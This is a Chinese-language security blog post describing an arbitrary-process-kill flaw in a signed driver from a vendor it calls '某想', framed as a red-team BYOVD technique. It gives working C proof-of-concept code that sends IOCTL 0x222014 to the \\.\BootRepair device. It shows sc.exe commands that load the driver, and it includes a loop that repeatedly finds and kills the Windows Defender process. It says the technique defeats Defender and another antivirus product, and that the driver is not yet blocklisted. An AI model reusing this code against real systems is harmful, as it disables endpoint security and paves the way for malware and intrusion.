某想驱动存在任意结束进程漏洞
摘要:前言在日常翻看 GitHub 追踪红队前沿武器库时,注意到了 PhantomKiller 这个项目。原理也很简单,利用带有合法数字签名的脆弱性驱动程序(即 BYOVD 漏洞),通过合法的驱动绕过 Windows 的驱动程序强制签名,利用驱动存在在结束进程函数结束杀软,在近几年来,白驱动出现的频率特别…
前言
驱动分析
可以看到驱动签名来源于某想




代码实现
int main(int argc, char* argv[]) {if (argc != 2) {printf("usage: poc.exe <pid>\n");return 1;}DWORD pid = atoi(argv[1]);HANDLE h = CreateFileW(L"\\\\.\\BootRepair", GENERIC_READ | GENERIC_WRITE, 0, NULL, OPEN_EXISTING, 0, NULL);if (h == INVALID_HANDLE_VALUE) {printf("[-] open device failed: %d\n", GetLastError());return 1;}DWORD ret;if (DeviceIoControl(h, 0x222014, &pid, sizeof(pid), NULL, 0, &ret, NULL))printf("[+] killed %d\n", pid);elseprintf("[-] ioctl failed: %d\n", GetLastError());CloseHandle(h);return 0;}
实战效果
window defender
这里模拟漏洞驱动加载
sc.exe create test binPath="test.sys" type=kernelsc.exe start test



相关代码
DWORD GetDefenderProcessId(const wchar_t* processName) {DWORD pid = 0;HANDLE hSnapshot = NULL;PROCESSENTRY32W pe32;hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);if (hSnapshot == INVALID_HANDLE_VALUE) {return 0;}pe32.dwSize = sizeof(PROCESSENTRY32W);if (!Process32FirstW(hSnapshot, &pe32)) {CloseHandle(hSnapshot);return 0;}do {if (_wcsicmp(pe32.szExeFile, processName) == 0) {pid = pe32.th32ProcessID;break;}} while (Process32NextW(hSnapshot, &pe32));CloseHandle(hSnapshot);return pid;}int main(int argc, char* argv[]) {HANDLE h = CreateFileW(L"\\\\.\\BootRepair", GENERIC_READ | GENERIC_WRITE, 0, NULL, OPEN_EXISTING, 0, NULL);if (h == INVALID_HANDLE_VALUE) {printf("[-] open device failed: %d\n", GetLastError());return 1;}DWORD ret;while (TRUE) {DWORD pid = GetDefenderProcessId(DEFENDER_PROCESS_NAME);if (DeviceIoControl(h, 0x222014, &pid, sizeof(pid), NULL, 0, &ret, NULL))printf("[+] killed %d\n", pid);elseprintf("[-] ioctl failed: %d\n", GetLastError());}CloseHandle(h);return 0;}
某绒
可以看到截至目前 该驱动还没有被拉黑












